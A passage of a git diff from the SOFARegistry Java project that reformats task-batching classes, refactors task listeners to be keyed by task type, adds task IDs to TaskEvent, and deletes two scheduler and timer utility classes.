workerRunnableFactory - * @param workerCount - * @param isShutdown - */ - TaskExecutors(Function> workerRunnableFactory, int workerCount, - AtomicBoolean isShutdown) { - this.isShutdown = isShutdown; - this.workerThreads = new ArrayList<>(); + /** + * constructor + * + * @param workerRunnableFactory + * @param workerCount + * @param isShutdown + */ + TaskExecutors( + Function> workerRunnableFactory, + int workerCount, + AtomicBoolean isShutdown) { + this.isShutdown = isShutdown; + this.workerThreads = new ArrayList<>(); - ThreadGroup threadGroup = new ThreadGroup("serverTaskExecutors"); - for (int i = 0; i < workerCount; i++) { - WorkerRunnable runnable = workerRunnableFactory.apply(i); - Thread workerThread = new Thread(threadGroup, runnable, runnable.getWorkerName()); - workerThreads.add(workerThread); - workerThread.setDaemon(true); - workerThread.start(); - } + ThreadGroup threadGroup = new ThreadGroup("serverTaskExecutors"); + for (int i = 0; i < workerCount; i++) { + WorkerRunnable runnable = workerRunnableFactory.apply(i); + Thread workerThread = new Thread(threadGroup, runnable, runnable.getWorkerName()); + workerThreads.add(workerThread); + workerThread.setDaemon(true); + workerThread.start(); } + } - /** - * - * @param name - * @param workerCount - * @param processor - * @param acceptorExecutor - * @param - * @param - * @return - */ - static TaskExecutors createTaskExecutors(final String name, - int workerCount, - final TaskProcessor processor, - final AcceptorExecutor acceptorExecutor) { - final AtomicBoolean isShutdown = new AtomicBoolean(); - return new TaskExecutors<>(idx -> new WorkerRunnable<>(name + '-' + idx, isShutdown, - processor, - acceptorExecutor), workerCount, isShutdown); - } + /** + * @param name + * @param workerCount + * @param processor + * @param acceptorExecutor + * @param + * @param + * @return + */ + static TaskExecutors createTaskExecutors( + final String name, + int workerCount, + final TaskProcessor processor, + final AcceptorExecutor acceptorExecutor) { + final AtomicBoolean isShutdown = new AtomicBoolean(); + return new TaskExecutors<>( + idx -> new WorkerRunnable<>(name + '-' + idx, isShutdown, processor, acceptorExecutor), + workerCount, + isShutdown); + } - /** - * shutdown workerThread - */ - void shutdown() { - if (isShutdown.compareAndSet(false, true)) { - for (Thread workerThread : workerThreads) { - workerThread.interrupt(); - } - } + /** shutdown workerThread */ + void shutdown() { + if (isShutdown.compareAndSet(false, true)) { + for (Thread workerThread : workerThreads) { + workerThread.interrupt(); + } } + } - /** - * - * @param - * @param - */ - static class WorkerRunnable implements Runnable { + /** + * @param + * @param + */ + static class WorkerRunnable implements Runnable { - final String workerName; - final AtomicBoolean isShutdown; - final TaskProcessor processor; - final AcceptorExecutor acceptorExecutor; + final String workerName; + final AtomicBoolean isShutdown; + final TaskProcessor processor; + final AcceptorExecutor acceptorExecutor; - WorkerRunnable(String workerName, AtomicBoolean isShutdown, TaskProcessor processor, - AcceptorExecutor acceptorExecutor) { - this.workerName = workerName; - this.isShutdown = isShutdown; - this.processor = processor; - this.acceptorExecutor = acceptorExecutor; - } + WorkerRunnable( + String workerName, + AtomicBoolean isShutdown, + TaskProcessor processor, + AcceptorExecutor acceptorExecutor) { + this.workerName = workerName; + this.isShutdown = isShutdown; + this.processor = processor; + this.acceptorExecutor = acceptorExecutor; + } - String getWorkerName() { - return workerName; - } + String getWorkerName() { + return workerName; + } - @Override - public void run() { - try { - while (!isShutdown.get()) { - try { - BlockingQueue> workQueue = acceptorExecutor - .requestWorkItem(); - TaskHolder taskHolder; - while ((taskHolder = workQueue.poll(1, TimeUnit.SECONDS)) == null) { - if (isShutdown.get()) { - return; - } - } - ProcessingResult result = processor.process(taskHolder.getTask()); - switch (result) { - case Success: - break; - case Congestion: - acceptorExecutor.reprocess(taskHolder, result); - break; - case TransientError: - acceptorExecutor.reprocess(taskHolder, result); - break; - case PermanentError: - LOGGER.warn("Discarding a task of {} due to permanent error", - workerName); - break; - default: - break; - } - } catch (InterruptedException e) { - // Ignore - } catch (Throwable e) { - LOGGER.error("Single WorkerThread process error", e); - } - } - } catch (Throwable e) { - LOGGER.error("WorkerThread error", e); + @Override + public void run() { + try { + while (!isShutdown.get()) { + try { + BlockingQueue> workQueue = acceptorExecutor.requestWorkItem(); + TaskHolder taskHolder; + while ((taskHolder = workQueue.poll(1, TimeUnit.SECONDS)) == null) { + if (isShutdown.get()) { + return; + } + } + ProcessingResult result = processor.process(taskHolder.getTask()); + switch (result) { + case Success: + break; + case Congestion: + acceptorExecutor.reprocess(taskHolder, result); + break; + case TransientError: + acceptorExecutor.reprocess(taskHolder, result); + break; + case PermanentError: + LOGGER.warn("Discarding a task of {} due to permanent error", workerName); + break; + default: + break; } + } catch (InterruptedException e) { + // Ignore + } catch (Throwable e) { + LOGGER.error("Single WorkerThread process error", e); + } } + } catch (Throwable e) { + LOGGER.error("WorkerThread error", e); + } } -} \ No newline at end of file + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskHolder.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskHolder.java index 304395eb1..e3b76476c 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskHolder.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskHolder.java @@ -18,63 +18,63 @@ /** * @author Tomasz Bak - * * @author shangyu.wh modify * @version $Id: TaskHolder.java, v 0.1 2017-11-14 14:57 shangyu.wh Exp $ */ public class TaskHolder { - private final ID id; - private final T task; - private final long expiryTime; - private final long submitTimestamp; + private final ID id; + private final T task; + private final long expiryTime; + private final long submitTimestamp; - /** - * constructor - * @param id - * @param task - * @param expiryTime - */ - TaskHolder(ID id, T task, long expiryTime) { - this.id = id; - this.expiryTime = expiryTime; - this.task = task; - this.submitTimestamp = System.currentTimeMillis(); - } + /** + * constructor + * + * @param id + * @param task + * @param expiryTime + */ + TaskHolder(ID id, T task, long expiryTime) { + this.id = id; + this.expiryTime = expiryTime; + this.task = task; + this.submitTimestamp = System.currentTimeMillis(); + } - /** - * Getter method for property id. - * - * @return property value of id - */ - public ID getId() { - return id; - } + /** + * Getter method for property id. + * + * @return property value of id + */ + public ID getId() { + return id; + } - /** - * Getter method for property task. - * - * @return property value of task - */ - public T getTask() { - return task; - } + /** + * Getter method for property task. + * + * @return property value of task + */ + public T getTask() { + return task; + } - /** - * Getter method for property expiryTime. - * - * @return property value of expiryTime - */ - public long getExpiryTime() { - return expiryTime; - } + /** + * Getter method for property expiryTime. + * + * @return property value of expiryTime + */ + public long getExpiryTime() { + return expiryTime; + } - /** - * Getter method for property submitTimestamp. - * - * @return property value of submitTimestamp - */ - public long getSubmitTimestamp() { - return submitTimestamp; - } -} \ No newline at end of file + /** + * Getter method for property submitTimestamp. + * + * @return property value of submitTimestamp + */ + public long getSubmitTimestamp() { + return submitTimestamp; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskProcessor.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskProcessor.java index 886f627bf..1d43ef6c9 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskProcessor.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TaskProcessor.java @@ -22,33 +22,34 @@ * An interface to be implemented by clients for task execution. * * @author Tomasz Bak - * * @author shangyu.wh modify * @version $Id: TaskProcessor.java, v 0.1 2017-11-14 15:27 shangyu.wh Exp $ */ public interface TaskProcessor { - /** - * A processed task/task list ends up in one of the following states: - *
    - *
  • {@code Success} processing finished successfully
  • - *
  • {@code TransientError} processing failed, but shall be retried later
  • - *
  • {@code PermanentError} processing failed, and is non recoverable
  • - *
- */ - enum ProcessingResult { - Success, Congestion, TransientError, PermanentError - } + /** + * A processed task/task list ends up in one of the following states: + * + *
    + *
  • {@code Success} processing finished successfully + *
  • {@code TransientError} processing failed, but shall be retried later + *
  • {@code PermanentError} processing failed, and is non recoverable + *
+ */ + enum ProcessingResult { + Success, + Congestion, + TransientError, + PermanentError + } - /** - * In non-batched mode a single task is processed at a time. - */ - ProcessingResult process(T task); + /** In non-batched mode a single task is processed at a time. */ + ProcessingResult process(T task); - /** - * For batched mode a collection of tasks is run at a time. The result is provided for the aggregated result, - * and all tasks are handled in the same way according to what is returned (for example are rescheduled, if the - * error is transient). - */ - ProcessingResult process(List tasks); -} \ No newline at end of file + /** + * For batched mode a collection of tasks is run at a time. The result is provided for the + * aggregated result, and all tasks are handled in the same way according to what is returned (for + * example are rescheduled, if the error is transient). + */ + ProcessingResult process(List tasks); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TrafficShaper.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TrafficShaper.java index 2a492654d..17b5646f0 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TrafficShaper.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/batcher/TrafficShaper.java @@ -19,72 +19,64 @@ import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; /** - * {@link TrafficShaper} provides admission control policy prior to dispatching tasks to workers. - * It reacts to events coming via reprocess requests (transient failures, congestion), and delays the processing - * depending on this feedback. + * {@link TrafficShaper} provides admission control policy prior to dispatching tasks to workers. It + * reacts to events coming via reprocess requests (transient failures, congestion), and delays the + * processing depending on this feedback. * * @author Tomasz Bak - * * @author shangyu.wh modify * @version $Id: TrafficShaper.java, v 0.1 2017-11-14 15:37 shangyu.wh Exp $ */ public class TrafficShaper { - private static final long MAX_DELAY = 30 * 1000; + private static final long MAX_DELAY = 30 * 1000; - private final long congestionRetryDelayMs; - private final long networkFailureRetryMs; + private final long congestionRetryDelayMs; + private final long networkFailureRetryMs; - private volatile long lastCongestionError; - private volatile long lastNetworkFailure; + private volatile long lastCongestionError; + private volatile long lastNetworkFailure; - /** - * - * @param congestionRetryDelayMs - * @param networkFailureRetryMs - */ - TrafficShaper(long congestionRetryDelayMs, long networkFailureRetryMs) { - this.congestionRetryDelayMs = Math.min(MAX_DELAY, congestionRetryDelayMs); - this.networkFailureRetryMs = Math.min(MAX_DELAY, networkFailureRetryMs); - } + /** + * @param congestionRetryDelayMs + * @param networkFailureRetryMs + */ + TrafficShaper(long congestionRetryDelayMs, long networkFailureRetryMs) { + this.congestionRetryDelayMs = Math.min(MAX_DELAY, congestionRetryDelayMs); + this.networkFailureRetryMs = Math.min(MAX_DELAY, networkFailureRetryMs); + } - /** - * - * @param processingResult - */ - void registerFailure(ProcessingResult processingResult) { - if (processingResult == ProcessingResult.Congestion) { - lastCongestionError = System.currentTimeMillis(); - } else if (processingResult == ProcessingResult.TransientError) { - lastNetworkFailure = System.currentTimeMillis(); - } + /** @param processingResult */ + void registerFailure(ProcessingResult processingResult) { + if (processingResult == ProcessingResult.Congestion) { + lastCongestionError = System.currentTimeMillis(); + } else if (processingResult == ProcessingResult.TransientError) { + lastNetworkFailure = System.currentTimeMillis(); } + } - /** - * - * @return - */ - long transmissionDelay() { - if (lastCongestionError == -1 && lastNetworkFailure == -1) { - return 0; - } + /** @return */ + long transmissionDelay() { + if (lastCongestionError == -1 && lastNetworkFailure == -1) { + return 0; + } - long now = System.currentTimeMillis(); - if (lastCongestionError != -1) { - long congestionDelay = now - lastCongestionError; - if (congestionDelay >= 0 && congestionDelay < congestionRetryDelayMs) { - return congestionRetryDelayMs - congestionDelay; - } - lastCongestionError = -1; - } + long now = System.currentTimeMillis(); + if (lastCongestionError != -1) { + long congestionDelay = now - lastCongestionError; + if (congestionDelay >= 0 && congestionDelay < congestionRetryDelayMs) { + return congestionRetryDelayMs - congestionDelay; + } + lastCongestionError = -1; + } - if (lastNetworkFailure != -1) { - long failureDelay = now - lastNetworkFailure; - if (failureDelay >= 0 && failureDelay < networkFailureRetryMs) { - return networkFailureRetryMs - failureDelay; - } - lastNetworkFailure = -1; - } - return 0; + if (lastNetworkFailure != -1) { + long failureDelay = now - lastNetworkFailure; + if (failureDelay >= 0 && failureDelay < networkFailureRetryMs) { + return networkFailureRetryMs - failureDelay; + } + lastNetworkFailure = -1; } -} \ No newline at end of file + return 0; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/DefaultTaskListenerManager.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/DefaultTaskListenerManager.java index 8e6b23077..6ee622822 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/DefaultTaskListenerManager.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/DefaultTaskListenerManager.java @@ -16,7 +16,9 @@ */ package com.alipay.sofa.registry.task.listener; -import java.util.ArrayList; +import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; +import com.google.common.collect.ArrayListMultimap; +import com.google.common.collect.Multimap; import java.util.Collection; /** @@ -24,25 +26,24 @@ * @since 2018/12/28 */ public class DefaultTaskListenerManager implements TaskListenerManager { - private Collection taskListeners = new ArrayList<>(); - @Override - public Collection getTaskListeners() { - return taskListeners; - } + private Multimap taskListeners = ArrayListMultimap.create(); - @Override - public void addTaskListener(TaskListener taskListener) { - taskListeners.add(taskListener); - } + @Override + public Multimap getTaskListeners() { + return taskListeners; + } - @Override - public void sendTaskEvent(TaskEvent taskEvent) { + @Override + public void addTaskListener(TaskListener taskListener) { + taskListeners.put(taskListener.support(), taskListener); + } - for (TaskListener taskListener : taskListeners) { - if (taskListener.support(taskEvent)) { - taskListener.handleEvent(taskEvent); - } - } + @Override + public void sendTaskEvent(TaskEvent taskEvent) { + Collection taskListeners = this.taskListeners.get(taskEvent.getTaskType()); + for (TaskListener taskListener : taskListeners) { + taskListener.handleEvent(taskEvent); } + } } diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskEvent.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskEvent.java index 16f1abcc3..ac36bf61f 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskEvent.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskEvent.java @@ -16,186 +16,175 @@ */ package com.alipay.sofa.registry.task.listener; -import com.alipay.sofa.registry.task.TaskClosure; - import java.util.Map; import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.atomic.AtomicInteger; /** - * * @author shangyu.wh * @version $Id: TaskEvent.java, v 0.1 2017-12-07 18:12 shangyu.wh Exp $ */ public class TaskEvent { - public enum TaskType { - //Session task - SUBSCRIBER_REGISTER_FETCH_TASK("SubscriberRegisterFetchTask"), SUBSCRIBER_PUSH_EMPTY_TASK( - "SubscriberPushEmptyTask"), WATCHER_REGISTER_FETCH_TASK( - "WatcherRegisterFetchTask"), DATA_CHANGE_FETCH_TASK( - "DataChangeFetchTask"), DATA_PUSH_TASK( - "DataPushTask"), DATA_CHANGE_FETCH_CLOUD_TASK( - "DataChangeFetchCloudTask"), RECEIVED_DATA_MULTI_PUSH_TASK( - "ReceivedDataMultiPushTask"), RECEIVED_DATA_CONFIG_PUSH_TASK( - "ReceivedDataConfigPushTask"), CANCEL_DATA_TASK( - "CancelDataTask"), SYNC_PUBLISHER_TASK( - "SyncPublisherTask"), SYNC_SUBSCRIBER_TASK( - "SyncSubscriberTask"), SESSION_REGISTER_DATA_TASK( - "SessionRegisterDataTask"), PROVIDE_DATA_CHANGE_FETCH_TASK( - "ProvideDataChangeFetchTask"), - - SUBSCRIBER_MULTI_FETCH_TASK("SubscriberMultiFetchTask"), - - //Session Adapter task - USER_DATA_ELEMENT_PUSH_TASK("UserDataElementPushTask"), USER_DATA_ELEMENT_MULTI_PUSH_TASK( - "UserDataElementMultiPushTask"), - - //MetaServer task - SESSION_NODE_CHANGE_PUSH_TASK("SessionNodeChangePushTask"), DATA_NODE_CHANGE_PUSH_TASK( - "DataNodeChangePushTask"), RECEIVE_STATUS_CONFIRM_NOTIFY_TASK( - "ReceiveStatusConfirmNotifyTask"), PERSISTENCE_DATA_CHANGE_NOTIFY_TASK( - "PersistenceDataChangeNotifyTask"); - - private String name; - - TaskType(String name) { - this.name = name; - } - - public String getName() { - return name; - } - } - - private Object eventObj; - - private TaskType taskType; - - private long sendTimeStamp; - - private long createTime; + public enum TaskType { + // Session task + WATCHER_REGISTER_FETCH_TASK("WatcherRegisterFetchTask"), // + RECEIVED_DATA_CONFIG_PUSH_TASK("ReceivedDataConfigPushTask"), // + SYNC_PUBLISHER_TASK("SyncPublisherTask"), // + SYNC_UNPUBLISHER_TASK("SyncUnPublisherTask"), // + SYNC_SUBSCRIBER_TASK("SyncSubscriberTask"), // + SYNC_UNSUBSCRIBER_TASK("SyncUnSubscriberTask"), // + PROVIDE_DATA_CHANGE_FETCH_TASK("ProvideDataChangeFetchTask"), // - private final Map attributes = new ConcurrentHashMap(); + // MetaServer task + PERSISTENCE_DATA_CHANGE_NOTIFY_TASK("PersistenceDataChangeNotifyTask"), // + ; - /** - * constructor - * @param taskType - */ - public TaskEvent(TaskType taskType) { - this.taskType = taskType; - this.createTime = System.currentTimeMillis(); - } - - private TaskClosure taskClosure; - - /** - * constructor - * @param eventObj - * @param taskType - */ - public TaskEvent(Object eventObj, TaskType taskType) { - this.eventObj = eventObj; - this.taskType = taskType; - } + private String name; - /** - * Getter method for property eventObj. - * - * @return property value of eventObj - */ - public Object getEventObj() { - return eventObj; - } - - /** - * Setter method for property eventObj. - * - * @param eventObj value to be assigned to property eventObj - */ - public void setEventObj(Object eventObj) { - this.eventObj = eventObj; - } + private AtomicInteger nextId = new AtomicInteger(0); - /** - * Getter method for property taskType. - * - * @return property value of taskType - */ - public TaskType getTaskType() { - return taskType; + TaskType(String name) { + this.name = name; } - /** - * get attribute by key - * @param key - * @return - */ - public Object getAttribute(String key) { - return attributes.get(key); + public String getName() { + return name; } - - /** - * set attribute - * @param key - * @param value - */ - public void setAttribute(String key, Object value) { - if (value == null) { - //The null value is not allowed in the ConcurrentHashMap. - attributes.remove(key); - } else { - attributes.put(key, value); - } - } - - /** - * Getter method for property taskClosure. - * - * @return property value of taskClosure - */ - public TaskClosure getTaskClosure() { - return taskClosure; - } - - /** - * Setter method for property taskClosure. - * - * @param taskClosure value to be assigned to property taskClosure - */ - public void setTaskClosure(TaskClosure taskClosure) { - this.taskClosure = taskClosure; - } - - /** - * Getter method for property sendTimeStamp. - * - * @return property value of sendTimeStamp - */ - public long getSendTimeStamp() { - return sendTimeStamp; - } - - /** - * Setter method for property sendTimeStamp. - * - * @param sendTimeStamp value to be assigned to property sendTimeStamp - */ - public void setSendTimeStamp(long sendTimeStamp) { - this.sendTimeStamp = sendTimeStamp; - } - - /** - * Getter method for property createTime. - * - * @return property value of createTime - */ - public long getCreateTime() { - return createTime; - } - - @Override - public String toString() { - return "TaskEvent{" + "eventObj=" + eventObj + ", sendTimeStamp=" + sendTimeStamp - + ", attributes=" + attributes + '}'; + } + + private Object eventObj; + + private TaskType taskType; + + private long sendTimeStamp; + + private final long createTime; + + private final String taskId; + + private final Map attributes = new ConcurrentHashMap(); + + /** + * constructor + * + * @param taskType + */ + public TaskEvent(TaskType taskType) { + this.taskType = taskType; + this.createTime = System.currentTimeMillis(); + this.taskId = + String.format( + "%s-%s-%s", taskType.name, this.createTime, taskType.nextId.getAndIncrement()); + } + + /** + * constructor + * + * @param eventObj + * @param taskType + */ + public TaskEvent(Object eventObj, TaskType taskType) { + this(taskType); + this.eventObj = eventObj; + } + + /** + * Getter method for property taskId. + * + * @return property value of taskId + */ + public String getTaskId() { + return taskId; + } + + /** + * Getter method for property eventObj. + * + * @return property value of eventObj + */ + public Object getEventObj() { + return eventObj; + } + + /** + * Setter method for property eventObj. + * + * @param eventObj value to be assigned to property eventObj + */ + public void setEventObj(Object eventObj) { + this.eventObj = eventObj; + } + + /** + * Getter method for property taskType. + * + * @return property value of taskType + */ + public TaskType getTaskType() { + return taskType; + } + + /** + * get attribute by key + * + * @param key + * @return + */ + public Object getAttribute(String key) { + return attributes.get(key); + } + + /** + * set attribute + * + * @param key + * @param value + */ + public void setAttribute(String key, Object value) { + if (value == null) { + // The null value is not allowed in the ConcurrentHashMap. + attributes.remove(key); + } else { + attributes.put(key, value); } -} \ No newline at end of file + } + + /** + * Getter method for property sendTimeStamp. + * + * @return property value of sendTimeStamp + */ + public long getSendTimeStamp() { + return sendTimeStamp; + } + + /** + * Setter method for property sendTimeStamp. + * + * @param sendTimeStamp value to be assigned to property sendTimeStamp + */ + public void setSendTimeStamp(long sendTimeStamp) { + this.sendTimeStamp = sendTimeStamp; + } + + /** + * Getter method for property createTime. + * + * @return property value of createTime + */ + public long getCreateTime() { + return createTime; + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("TaskEvent{"); + sb.append("eventObj=").append(eventObj); + sb.append(", sendTimeStamp=").append(sendTimeStamp); + sb.append(", attributes=").append(attributes); + sb.append(", taskId='").append(taskId).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListener.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListener.java index 547d3b154..0914703cc 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListener.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListener.java @@ -16,25 +16,25 @@ */ package com.alipay.sofa.registry.task.listener; +import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; + /** - * * @author shangyu.wh * @version $Id: TaskListener.java, v 0.1 2017-12-07 18:11 shangyu.wh Exp $ */ public interface TaskListener { - /** - * com.alipay.sofa.registry.server.meta.listener type check - * - * @param event - * @return true or false。 - */ - boolean support(TaskEvent event); + /** + * com.alipay.sofa.registry.server.meta.listener type check + * + * @return type + */ + TaskType support(); - /** - * event execute - * - * @param event - */ - void handleEvent(TaskEvent event); -} \ No newline at end of file + /** + * event execute + * + * @param event + */ + void handleEvent(TaskEvent event); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListenerManager.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListenerManager.java index dc19c661d..e5b04c5f6 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListenerManager.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/task/listener/TaskListenerManager.java @@ -16,30 +16,21 @@ */ package com.alipay.sofa.registry.task.listener; -import java.util.Collection; +import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; +import com.google.common.collect.Multimap; /** - * * @author shangyu.wh * @version $Id: TaskListenerManager.java, v 0.1 2017-12-07 18:14 shangyu.wh Exp $ */ public interface TaskListenerManager { - /** - * - * @return - */ - Collection getTaskListeners(); + /** @return */ + Multimap getTaskListeners(); - /** - * - * @param taskListener - */ - void addTaskListener(TaskListener taskListener); + /** @param taskListener */ + void addTaskListener(TaskListener taskListener); - /** - * - * @param taskEvent - */ - void sendTaskEvent(TaskEvent taskEvent); -} \ No newline at end of file + /** @param taskEvent */ + void sendTaskEvent(TaskEvent taskEvent); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/task/scheduler/TimedSupervisorTask.java b/server/common/util/src/main/java/com/alipay/sofa/registry/task/scheduler/TimedSupervisorTask.java deleted file mode 100644 index 64c49a8a1..000000000 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/task/scheduler/TimedSupervisorTask.java +++ /dev/null @@ -1,105 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.task.scheduler; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; - -import java.util.TimerTask; -import java.util.concurrent.Future; -import java.util.concurrent.RejectedExecutionException; -import java.util.concurrent.ScheduledExecutorService; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; -import java.util.concurrent.TimeoutException; -import java.util.concurrent.atomic.AtomicLong; - -/** - * A supervisor task that schedules subtasks while enforce a timeout. - * Wrapped subtasks must be thread safe. - * - * @author David Qiang Liu - * - * - * @author shangyu.wh modify - * @version $Id: TimedSupervisorTask.java, v 0.1 2017-11-28 15:28 shangyu.wh Exp $ - */ -public class TimedSupervisorTask extends TimerTask { - - private static final Logger LOGGER = LoggerFactory - .getLogger(TimedSupervisorTask.class); - - private final ScheduledExecutorService scheduler; - private final ThreadPoolExecutor executor; - private final long timeoutMillis; - private final Runnable task; - - private String name; - - private final AtomicLong delay; - private final long maxDelay; - - /** - * constructor - * @param name - * @param scheduler - * @param executor - * @param timeout - * @param timeUnit - * @param expBackOffBound - * @param task - */ - public TimedSupervisorTask(String name, ScheduledExecutorService scheduler, - ThreadPoolExecutor executor, int timeout, TimeUnit timeUnit, - int expBackOffBound, Runnable task) { - this.name = name; - this.scheduler = scheduler; - this.executor = executor; - this.timeoutMillis = timeUnit.toMillis(timeout); - this.task = task; - this.delay = new AtomicLong(timeoutMillis); - this.maxDelay = timeoutMillis * expBackOffBound; - - } - - @Override - public void run() { - Future future = null; - try { - future = executor.submit(task); - // block until done or timeout - future.get(timeoutMillis, TimeUnit.MILLISECONDS); - delay.set(timeoutMillis); - } catch (TimeoutException e) { - LOGGER.error("{} task supervisor timed out", name, e); - - long currentDelay = delay.get(); - long newDelay = Math.min(maxDelay, currentDelay * 2); - delay.compareAndSet(currentDelay, newDelay); - - } catch (RejectedExecutionException e) { - LOGGER.error("{} task supervisor rejected the task: {}", name, task, e); - } catch (Throwable e) { - LOGGER.error("{} task supervisor threw an exception", name, e); - } finally { - if (future != null) { - future.cancel(true); - } - scheduler.schedule(this, delay.get(), TimeUnit.MILLISECONDS); - } - } -} \ No newline at end of file diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/timer/AsyncHashedWheelTimer.java b/server/common/util/src/main/java/com/alipay/sofa/registry/timer/AsyncHashedWheelTimer.java deleted file mode 100644 index f6cd4d206..000000000 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/timer/AsyncHashedWheelTimer.java +++ /dev/null @@ -1,121 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.timer; - -import io.netty.util.HashedWheelTimer; -import io.netty.util.Timeout; -import io.netty.util.TimerTask; - -import java.util.concurrent.Executor; -import java.util.concurrent.RejectedExecutionException; -import java.util.concurrent.SynchronousQueue; -import java.util.concurrent.ThreadFactory; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * based on HashedWheelTimer, add function: exec TimerTask async - * - * @author kezhu.wukz - * @version $Id: AsyncHashedWheelTimer.java, v 0.1 2019-01-11 10:54 AM kezhu.wukz Exp $ - */ -public class AsyncHashedWheelTimer extends HashedWheelTimer { - /** */ - private final Executor executor; - - /** */ - private final TaskFailedCallback taskFailedCallback; - - /** - * - * @param threadFactory - * @param tickDuration - * @param unit - * @param ticksPerWheel - * @param asyncThreadFactory - */ - public AsyncHashedWheelTimer(ThreadFactory threadFactory, long tickDuration, TimeUnit unit, - int ticksPerWheel, ThreadFactory asyncThreadFactory, - TaskFailedCallback taskFailedCallback) { - super(threadFactory, tickDuration, unit, ticksPerWheel); - - this.executor = new ThreadPoolExecutor(0, Integer.MAX_VALUE, 60L, TimeUnit.SECONDS, - new SynchronousQueue<>(), asyncThreadFactory); - this.taskFailedCallback = taskFailedCallback; - } - - /** - */ - @Override - public Timeout newTimeout(TimerTask task, long delay, TimeUnit unit) { - return super.newTimeout(new AsyncTimerTask(task), delay, unit); - } - - /** - * - */ - class AsyncTimerTask implements TimerTask, Runnable { - /** */ - TimerTask timerTask; - /** */ - Timeout timeout; - - /** - * @param timerTask - */ - public AsyncTimerTask(TimerTask timerTask) { - super(); - this.timerTask = timerTask; - } - - /** - */ - @Override - public void run(Timeout timeout) throws Exception { - this.timeout = timeout; - try { - AsyncHashedWheelTimer.this.executor.execute(this); - } catch (RejectedExecutionException e) { - taskFailedCallback.executionRejected(e); - } catch (Throwable e) { - taskFailedCallback.executionRejected(e); - } - } - - /** - * @see java.lang.Runnable#run() - */ - @Override - public void run() { - try { - this.timerTask.run(this.timeout); - } catch (Throwable e) { - taskFailedCallback.executionFailed(e); - } - } - - } - - public interface TaskFailedCallback { - - void executionRejected(Throwable e); - - void executionFailed(Throwable e); - - } - -} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/trace/TraceID.java b/server/common/util/src/main/java/com/alipay/sofa/registry/trace/TraceID.java new file mode 100644 index 000000000..889806446 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/trace/TraceID.java @@ -0,0 +1,60 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an 